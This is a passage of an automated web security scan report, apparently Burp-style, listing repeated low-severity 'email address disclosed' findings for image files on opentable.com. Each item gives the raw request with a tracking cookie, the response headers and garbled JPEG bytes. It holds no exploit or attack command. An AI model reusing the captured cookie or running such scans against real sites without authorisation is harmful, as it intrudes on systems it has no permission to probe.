User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1705
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:21:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:09 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.138. http://www.opentable.com/img/restimages/x4/28498.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/28498.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/28498.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1552
Content-Type: image/jpeg
Last-Modified: Tue, 28 Jun 2011 16:24:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.139. http://www.opentable.com/img/restimages/x4/29911.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/29911.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/29911.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1775
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.140. http://www.opentable.com/img/restimages/x4/3261.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/3261.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/3261.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1648
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:09 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.141. http://www.opentable.com/img/restimages/x4/32800.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/32800.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/32800.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1829
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.142. http://www.opentable.com/img/restimages/x4/33988.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/33988.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/33988.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1837
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:08 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.143. http://www.opentable.com/img/restimages/x4/34978.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/34978.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/34978.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1695
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:44 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:30 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.144. http://www.opentable.com/img/restimages/x4/35518.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/35518.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/35518.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1621
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.145. http://www.opentable.com/img/restimages/x4/3691.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/3691.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/3691.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1671
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:40 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.146. http://www.opentable.com/img/restimages/x4/3847.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/3847.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/3847.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1676
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:44 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.147. http://www.opentable.com/img/restimages/x4/40873.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/40873.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/40873.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1855
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.148. http://www.opentable.com/img/restimages/x4/41065.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/41065.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/41065.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1724
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.149. http://www.opentable.com/img/restimages/x4/4119.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/4119.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/4119.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1800
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.150. http://www.opentable.com/img/restimages/x4/42679.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/42679.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/42679.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1499
Content-Type: image/jpeg
Last-Modified: Wed, 19 Jan 2011 19:42:53 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.151. http://www.opentable.com/img/restimages/x4/46645.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/46645.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/46645.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1498
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:24:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:08 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.152. http://www.opentable.com/img/restimages/x4/49015.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/49015.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/49015.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1523
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:24:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:45 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.153. http://www.opentable.com/img/restimages/x4/52144.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/52144.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/52144.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1723
Content-Type: image/jpeg
Last-Modified: Wed, 29 Sep 2010 15:20:35 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:49 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.154. http://www.opentable.com/img/restimages/x4/52390.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/52390.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/52390.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1567
Content-Type: image/jpeg
Last-Modified: Wed, 24 Nov 2010 02:51:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.155. http://www.opentable.com/img/restimages/x4/57301.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/57301.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/57301.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1578
Content-Type: image/jpeg
Last-Modified: Mon, 14 Mar 2011 19:02:46 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.156. http://www.opentable.com/img/restimages/x4/57688.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/57688.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/57688.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
